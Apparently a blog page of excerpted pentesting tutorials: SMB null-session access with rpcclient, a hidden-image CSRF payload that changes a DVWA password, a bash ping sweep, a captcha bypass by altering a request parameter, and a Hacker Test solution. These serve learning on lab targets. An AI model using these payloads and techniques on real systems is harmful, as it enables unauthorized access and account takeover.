While performing a pentest, if you discover a server running the SMB protocol  you can test if it’s vulnerable to anonymous connection (also called null session) and then glean a lot of informations with a RPC client. Nmap is usefull to locate that kind of service:

smb null session

Now you can try to interact with the remote machine with the help of rpcclient. To perform a null session you have to specify an empty user and an empty password. If the host is not vulnerable, you will get the following error:

$ rpcclient -U "" 192.168.1.31
Enter 's password:
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain WORKGROUP
error: NT_STATUS_ACCESS_DENIED

But if the host is vulnerable you will immediatly get a prompt:

$ rpcclient -U "" 192.168.1.18
Enter 's password:
rpcclient $>
...

Cross-Site Request Forgery aka CSRF is an attack unintentionally triggered by the user himself. It sends HTTP requests to execute unexpected actions in different ways: trough img tag to perform GET requests or with Ajax requests when POST is required. You can learn basic CSRF in DVWA.

To perform this CSRF you firstly need to log in, then you must visit a malicious site who will perform a stealth HTTP request who will submit the change password form with specific values.

Low

The original request can be found by using a local proxy like Burp Suite or analyzing HTTP headers with a browser extension like Live HTTP Headers. The payload:

<html>
  <head>
    <title>My malicious website</title>
  </head>
  <body>
    <p>It works like a charm!</p>
    <img src="http://local.dvwa.com/vulnerabilities/csrf/?password_new=azerty&password_conf=azerty&Change=Change" width="1" height="1" />
  </body>
</html>
...

In the second part of the first phase of a penetration test, active information gathering, it’s important to map as accurate as possible the network of you target. To find live hosts there is a technique called ping sweep. Different tools exist to perform that task.

Ping

A single ping can give you the ip address of the target, the ttl and the time. However since the method is based on ICMP requests, the target could be configured to block or trash them… With a simple bash script, you can loop throught a range of ip address to test them all:

#!/bin/bash

for ip in $(seq 200 220); do
  ping -c 1 192.168.11.$ip | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f1 &
done

The -c option is configured to only send 1 request. The grep is used to display only the host who respond to the request (and supposed alive) and finally cut is used for a nice display. Notice the & at the end of the line, it’s very usefull pto paralellize tasks and make the script faster. Here is the result:

ping sweep ping

...

Captchas are usually used to prevent robots to make an action instead of humans. It should add an extra layer of security but badly configured it could lead to unauthorized access…

When you try to submit the form without providing a captcha code, you get the following error:

dvwa captcha error

Low

Try to submit an empty password and take a look to the HTTP request and her parameters, you can notice the strange variable step:

dvwa captcha low

This variable is the step in the change password functionnality. So if you simply change it to 2 and replay the request with this new value, it works perfectly.

...

Hacker Test is an online hacker simulation. 20 levels to test your PHP, HTML and Javascript knowledge. Below the solution of the first ten.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

Level 1

In the source code we can see the following JavaScript lines:

var a="null";

function check()
{
  if (document.a.c.value == a) {
    document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
  } else {
    alert ("Try again");
  }
}

The value of the password input named c is compared with the variable a, which has a null value. This is the password: null

...